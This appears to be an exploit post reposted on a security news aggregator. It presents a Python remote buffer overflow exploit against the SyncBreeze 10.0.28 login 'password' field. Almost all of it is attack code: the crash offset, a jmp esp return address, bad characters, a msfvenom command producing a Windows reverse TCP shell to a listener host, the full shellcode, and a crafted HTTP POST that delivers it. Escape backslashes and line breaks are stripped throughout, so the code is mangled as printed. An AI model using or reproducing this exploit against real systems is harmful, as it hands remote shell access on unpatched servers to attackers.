HackDig : Dig high-quality web security articles for hackers

SyncBreeze 10.0.28 password Remote Buffer Overflow

2020-11-25 21:57
# Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow# Date: 18-Sep-2020# Exploit Author: Abdessalam king(A.salam)# Vendor Homepage: http://www.syncbreeze.com# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe# Version: 10.0.28# Tested on: Windows 7,windows xp,windows 10#72413372 [*] Exact match at offset 520#jmp esp FFE4 xffxe4#!mona modules#!mona find -s "xffxe4" -m libspp.dll#address esp => 10090C83#badchars ==> "x00x0ax0dx25x26x2bx3d"#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.199 LPORT=1337 -f c-b "x00x0ax0dx25x26x2bx3d"  EXITFUNC=thread#!/usr/bin/pythonimport socketshell =""shell +="xbax4bx38x98x39xddxc7xd9x74x24xf4x5fx33xc9xb1"shell +="x53x83xefxfcx31x57x10x03x57x10xa9xcdx64xd1xaf"shell +="x2ex95x22xcfxa7x70x13xcfxdcxf1x04xffx97x54xa9"shell +="x74xf5x4cx3axf8xd2x63x8bxb6x04x4dx0cxeax75xcc"shell +="x8exf0xa9x2exaex3bxbcx2fxf7x21x4dx7dxa0x2exe0"shell +="x92xc5x7ax39x18x95x6bx39xfdx6ex8ax68x50xe4xd5"shell +="xaax52x29x6exe3x4cx2ex4axbdxe7x84x21x3cx2exd5"shell +="xcax93x0fxd9x39xedx48xdexa1x98xa0x1cx5cx9bx76"shell +="x5exbax2ex6dxf8x49x88x49xf8x9ex4fx19xf6x6bx1b"shell +="x45x1bx6axc8xfdx27xe7xefxd1xa1xb3xcbxf5xeax60"shell +="x75xafx56xc7x8axafx38xb8x2exbbxd5xadx42xe6xb1"shell +="x02x6fx19x42x0cxf8x6ax70x93x52xe5x38x5cx7dxf2"shell +="x3fx77x39x6cxbex77x3axa4x05x23x6axdexacx4bxe1"shell +="x1ex50x9ex9cx15xf7x70x83xd7x6dx71x29x2ax1ax9b"shell +="xa2xf5x3axa4x68x9exd3x58x93xbexb3xd5x75xaaxa3"shell +="xb3x2ex43x06xe0xe6xf4x79xc3x8cx3bxf0xb3xd9xd3"shell +="x4cxaaxdexdcx4cxf9x48x4bxc7xedx4cx6axd8x38xe5"shell +="xfbx4fxb7x64x49xf1xc8xacx3bxf1x5cx4bxeaxa6xc8"shell +="x51xcbx81x57xa9x3ex92x9fx55xbfxb8xd4x60x55x83"shell +="x82x8cxb9x03x52xdbxd3x03x3axbbx87x57x5fxc4x1d"shell +="xc4xccx51x9exbdxa1xf2xf6x43x9cx35x59xbbxcbx45"shell +="x9ex43x8dx4ex5ex87x58x97x15xeex59xacx36xedx77"shell +="xd9xdexa8x12x60x83x4axc9xa7xbaxc8xfbx57x39xd0"shell +="x8ex52x05x56x63x2fx16x33x83x9cx17x16";payload = "username=AAAAA&password="+"A"*520+"x83x0cx09x10"+ "x90" *20 + shell +"x90"*(1400-520-4-20-len(shell))req =""req += "POST /login HTTP/1.1rn"req += "Host: 192.168.1.20rn"req += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101Firefox/68.0rn"req += "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"req += "Accept-Language: en-US,en;q=0.5rn"req += "Accept-Encoding: gzip, deflatern"req += "Referer: http://192.168.1.20/loginrn"req += "Content-Type: application/x-www-form-urlencodedrn"req += "Content-Length: "+str(len(payload))+"rn"req += "Connection: keep-alivern"req += "Upgrade-Insecure-Requests: 1rn"req += "rn"req += payload# print reqs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.1.20",80))s.send(req)print s.recv(1024)s.close()


Source: 8020110202-BLW/eussi/moc.ytirucesxc

Read:183 | Comments:0 | Tags:No Tag

“SyncBreeze 10.0.28 password Remote Buffer Overflow”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Tools

Tag Cloud